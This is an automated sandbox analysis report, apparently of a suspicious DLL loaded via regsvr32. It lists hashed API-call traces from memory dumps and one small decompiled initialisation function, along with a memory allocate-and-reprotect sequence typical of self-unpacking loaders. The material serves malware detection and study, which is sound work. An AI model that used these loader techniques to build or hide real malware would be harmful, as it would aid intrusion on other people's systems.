                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2c34c66aeaf2d24ee903d642749afd8c60a49eb4fd9f96f7b5e5e4e13af7c5f2
                                                                                                                                                                                                                                                          • Instruction ID: 82098994c70efd8d4e3c45957d7e2b321e27556d5e411c82d170fecc0eb5ad0b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c34c66aeaf2d24ee903d642749afd8c60a49eb4fd9f96f7b5e5e4e13af7c5f2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F21D879E45222A7DF129AA5AC40B2F36A8AF03768F328115ED15B7380EF30E911C5E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,6DE43991,?,00000001,6DE3F667,?,6DE43E50,00000001,?,?,?,6DE3F5F6,?,?), ref: 6DE3D3B1
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D40E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D444
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6DE700D0,000000FF,?,6DE43E50,00000001,?,?,?,6DE3F5F6,?,?,?,6DE6EBD8,0000002C,6DE3F667), ref: 6DE3D44F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2283115069-0
                                                                                                                                                                                                                                                          • Opcode ID: cb6f304b0a69db4b061f998ed8ef1c9ece2691c99c9d16a42553bcef70d7d7fd
                                                                                                                                                                                                                                                          • Instruction ID: 602da665b5cb33fdff0c97ad21f4106d8734112eae75152d3f2ebf50e4edafbf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb6f304b0a69db4b061f998ed8ef1c9ece2691c99c9d16a42553bcef70d7d7fd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20118D362082216BD75656759C84B7A21F9B7D267CF37452CF628E32D0DF618C11C521
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,00000001,6DE70096,6DE3D67C,6DE3D707,6DE70094,?,6DE37E19,6DE70096,6DE70094,?,?,?,6DE34DCE,00000001,6DE70098), ref: 6DE3D508
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D565
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D59B
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6DE700D0,000000FF,?,6DE37E19,6DE70096,6DE70094,?,?,?,6DE34DCE,00000001,6DE70098), ref: 6DE3D5A6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2283115069-0
                                                                                                                                                                                                                                                          • Opcode ID: 6bc40a457ab0535bb8136c511d8943d4fa0dcc009b7202138253765c87ec0974
                                                                                                                                                                                                                                                          • Instruction ID: e8e244a7054557dc06ddc2fe4966b906fe24a1379df690bf524f210871c4670e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bc40a457ab0535bb8136c511d8943d4fa0dcc009b7202138253765c87ec0974
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2311A33A248321BAEB5256659C80F3A31B9A7D227CF334628F628E22C0DF628815C121
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,6DE3A304,?,?,6DE7C7C4,00000000,?,6DE3A42F,00000004,6DE693A4,6DE6939C,6DE693A4,00000000), ref: 6DE3A2D3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                                          • Opcode ID: c552bafe0f76c1889c5f5f5332c078ca48f1cb7a43a23984940150e32eb1eeee
                                                                                                                                                                                                                                                          • Instruction ID: 090efdac8c241f77240bde0cc2ff51d720eb31034e8731b7659798bb544ac53c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c552bafe0f76c1889c5f5f5332c078ca48f1cb7a43a23984940150e32eb1eeee
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F411A336AC5632ABDF129A688C40F7A33F8AB02764F234114FD10B7380DB71E981C6D1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                          			E6DDF146C() {
                                                                                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                                                                                          				long _t3;
                                                                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                                                                          				long _t5;
                                                                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                                                                          				intOrPtr _t8;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t8 =  *0x6ddf41b0;
                                                                                                                                                                                                                                                          				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                          				 *0x6ddf41bc = _t1;
                                                                                                                                                                                                                                                          				if(_t1 == 0) {
                                                                                                                                                                                                                                                          					return GetLastError();
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t3 = GetVersion();
                                                                                                                                                                                                                                                          				if(_t3 <= 5) {
                                                                                                                                                                                                                                                          					_t4 = 0x32;
                                                                                                                                                                                                                                                          					return _t4;
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					 *0x6ddf41ac = _t3;
                                                                                                                                                                                                                                                          					_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                                          					 *0x6ddf41a8 = _t5;
                                                                                                                                                                                                                                                          					 *0x6ddf41b0 = _t8;
                                                                                                                                                                                                                                                          					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                                          					 *0x6ddf41a4 = _t6;
                                                                                                                                                                                                                                                          					if(_t6 == 0) {
                                                                                                                                                                                                                                                          						 *0x6ddf41a4 =  *0x6ddf41a4 | 0xffffffff;
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                          0x6ddf146d
                                                                                                                                                                                                                                                          0x6ddf147b
                                                                                                                                                                                                                                                          0x6ddf1483
                                                                                                                                                                                                                                                          0x6ddf1488
                                                                                                                                                                                                                                                          0x6ddf14d2
                                                                                                                                                                                                                                                          0x6ddf14d2
                                                                                                                                                                                                                                                          0x6ddf148a
                                                                                                                                                                                                                                                          0x6ddf1492
                                                                                                                                                                                                                                                          0x6ddf14ce
                                                                                                                                                                                                                                                          0x6ddf14d0
                                                                                                                                                                                                                                                          0x6ddf1494
                                                                                                                                                                                                                                                          0x6ddf1494
                                                                                                                                                                                                                                                          0x6ddf1499
                                                                                                                                                                                                                                                          0x6ddf14a7
                                                                                                                                                                                                                                                          0x6ddf14ac
                                                                                                                                                                                                                                                          0x6ddf14b2
                                                                                                                                                                                                                                                          0x6ddf14ba
                                                                                                                                                                                                                                                          0x6ddf14bf
                                                                                                                                                                                                                                                          0x6ddf14c1
                                                                                                                                                                                                                                                          0x6ddf14c1
                                                                                                                                                                                                                                                          0x6ddf14cb
                                                                                                                                                                                                                                                          0x6ddf14cb

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DDF17B8,751463F0,00000000), ref: 6DDF147B
                                                                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 6DDF148A
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 6DDF1499
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DDF14B2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481707727.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481697233.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481717024.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481730026.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481741873.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 845504543-0
                                                                                                                                                                                                                                                          • Opcode ID: 2e5d012600136ab88dfd0cc1f432846a9a55288a5a49af3e0d8a054687beabc7
                                                                                                                                                                                                                                                          • Instruction ID: 89e4be0d93353c99745d9452d29f6fd94fb1cce2d9793a767e99b8a4f8802c58
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e5d012600136ab88dfd0cc1f432846a9a55288a5a49af3e0d8a054687beabc7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F03A71685211EFFF50BF69BD09B953BB4F71AB11F12401AF119D91C5D7B040418F59
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,6DE3F667,00000000,?,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001), ref: 6DE47C03
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000,00000001,?,6DE43E74,6DE3F5F6), ref: 6DE47C0F
                                                                                                                                                                                                                                                            • Part of subcall function 6DE47BD5: CloseHandle.KERNEL32(6DE70910,6DE47C1F,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000,00000001), ref: 6DE47BE5
                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 6DE47C1F
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,6DE3F667,00000000,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000), ref: 6DE47C34
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseErrorHandleLast___initconout
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 892448922-0
                                                                                                                                                                                                                                                          • Opcode ID: 71442192e457935bb9fc9bebdd1fde22d1d08fb711d40f7acd0f666c89f47159
                                                                                                                                                                                                                                                          • Instruction ID: 857b38e379a6607ce46a2f58ef36bf43df82ef0b2be58f83381681d805834032
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71442192e457935bb9fc9bebdd1fde22d1d08fb711d40f7acd0f666c89f47159
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3F01C36501129BBDF626FD1DD08A9A3FB6EB4A3A4F118014FE18A5260CB328960DBD0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                          • API String ID: 0-3922119987
                                                                                                                                                                                                                                                          • Opcode ID: c9fd5fa1f136a00acad8e2434a43b89b3b218200add9d67ef45a5da2d61128a3
                                                                                                                                                                                                                                                          • Instruction ID: 1177f8be6ac38978d84a475a5888ab8d44364a7ff606dbb0b8f5564a53dbfe10
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9fd5fa1f136a00acad8e2434a43b89b3b218200add9d67ef45a5da2d61128a3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18414771B44235ABDB12DF999C809BEBBF8EF86314F32405AE514A7340DB71DA41C754
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,0000079C,00003000,00000040,0000079C,6DE71E18), ref: 6DE72480
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6DE71E7C), ref: 6DE724B7
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6DE72517
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE7254D
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(6DDF0000,00000000,00000004,6DE723A2), ref: 6DE72652
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(6DDF0000,00001000,00000004,6DE723A2), ref: 6DE72679
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6DE723A2), ref: 6DE72746
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6DE723A2,?), ref: 6DE7279C
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE727B8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.485210202.000000006DE71000.00000040.00020000.sdmp, Offset: 6DE71000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2574235972-0
                                                                                                                                                                                                                                                          • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                          • Instruction ID: 0efb1801fed34ec62a7a663e9c3cf7a36147c5d7f49471c05b40fc200e059d46
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98D17E362002819FDF61CF54C880F5177A6FF58714B1A45A4EE0AAF75BEB31B850DB62
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3136044242-0
                                                                                                                                                                                                                                                          • Opcode ID: 6a239367ff97cd0305287699f3b90df4ed213882566a870ebd34730c81fdb391
                                                                                                                                                                                                                                                          • Instruction ID: 2b87e4c9354f9012ce1a144f5639eeef7f517a0465a234262c58401ed5d7a458
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a239367ff97cd0305287699f3b90df4ed213882566a870ebd34730c81fdb391
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0219471D04739FBDB266E54CC40ABF3A79EB85698F234119F81467610CB308E03CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __RTC_Initialize.LIBCMT ref: 6DE37387
                                                                                                                                                                                                                                                            • Part of subcall function 6DE37BA4: RtlInitializeSListHead.NTDLL(6DE7C780), ref: 6DE37BA9
                                                                                                                                                                                                                                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6DE373F1
                                                                                                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 6DE3743B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 2097537958-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: 666801027a55f97e3a23701d656bfd9d6cd441d26fc371e74d22a7bfef79a88d
                                                                                                                                                                                                                                                          • Instruction ID: af419aaefb9eeaa3da4893b8e8e0b2197aa4f62a32966191de4adaa6bca7c65f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 666801027a55f97e3a23701d656bfd9d6cd441d26fc371e74d22a7bfef79a88d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91218E32A4C232DADB05BBB4A9047BC7BB19F0632DF33845DDA807B2C1DF615545C665
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,?), ref: 6DE335B3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                                          • Opcode ID: 2a078a42a687d0d38597212de1fb6c51f92280019bb8d77228cd409bea1cf183
                                                                                                                                                                                                                                                          • Instruction ID: 1115afd1a7ed923e406f6e647771b745372071fa741e67ba74b00846fb492e03
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a078a42a687d0d38597212de1fb6c51f92280019bb8d77228cd409bea1cf183
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F7122719002748FCB54CF2EC490BB97BF6FB47220F25866AE494D7381D7399609DB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DE40978: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6DE409B9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42FBC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                                                                                                          • Opcode ID: b7804acc5ac8e76e4e277d302aae37f77a1a99be9d03590c493c00d748cf0a8c
                                                                                                                                                                                                                                                          • Instruction ID: da0b4d0f3ed5bc1f87e932daf56c05df0494675c833e116fcacd40ee9987ed17
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7804acc5ac8e76e4e277d302aae37f77a1a99be9d03590c493c00d748cf0a8c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA014E726043169BC3318F58D88099AFB98FF553B4F61462DE955F76C0DB705910C7A4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6DE409B9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: e43f7b01dcb2410d4e0cc150c082f31e1611fb396fa6e5deed64c7cdaf00cbaa
                                                                                                                                                                                                                                                          • Instruction ID: 8f3cdb6fc238f1dcb111a644db3b11c1714873b558ea6b24662a11a3468a7414
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e43f7b01dcb2410d4e0cc150c082f31e1611fb396fa6e5deed64c7cdaf00cbaa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0B43164963567FB529A27AC04B6A3768AFE6774B32C035AB2CF6280CF20D44182A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 6DE4297E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456CE
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456E0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456F2
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45704
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45716
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45728
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4573A
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4574C
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4575E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45770
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45782
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45794
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE457A6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42973
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42995
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429AA
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429B5
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429D7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429EA
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429F8
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A03
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A3B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A42
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A5F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A77
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                          • Opcode ID: 5bc5d7dabc40d387ff5b54aff10c1e47f8e9c51b520f6bb14d3579fc390057cf
                                                                                                                                                                                                                                                          • Instruction ID: 62937f88dd65bbaf75270fac1dbc8802996cfce4dc97a32381c655e6db36b1e5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bc5d7dabc40d387ff5b54aff10c1e47f8e9c51b520f6bb14d3579fc390057cf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D315B31608602AEEB308A35E844B7A77E8BF50358F72852DE96DE6250DF31E860DB14
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6DE395CB
                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 6DE395F2
                                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 6DE396FE
                                                                                                                                                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 6DE39753
                                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6DE397D9
                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 6DE39860
                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 6DE3987B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                          • API String ID: 4234981820-393685449
                                                                                                                                                                                                                                                          • Opcode ID: 84a5ec7c0079e7f92af8cc979752def55742a623ea7267c367ddf969d144cf9b
                                                                                                                                                                                                                                                          • Instruction ID: e1c052020db4e65fc723426a1066abd43358c49f38e40b9b481dbb45479a0978
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84a5ec7c0079e7f92af8cc979752def55742a623ea7267c367ddf969d144cf9b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C14971C0822AABCF15CFA4CC809BEBBB5AF48318F224159E9157B241DF35D651CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D27E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D28A
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D295
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2A0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2AB
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2B6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2C1
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2CC
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2D7
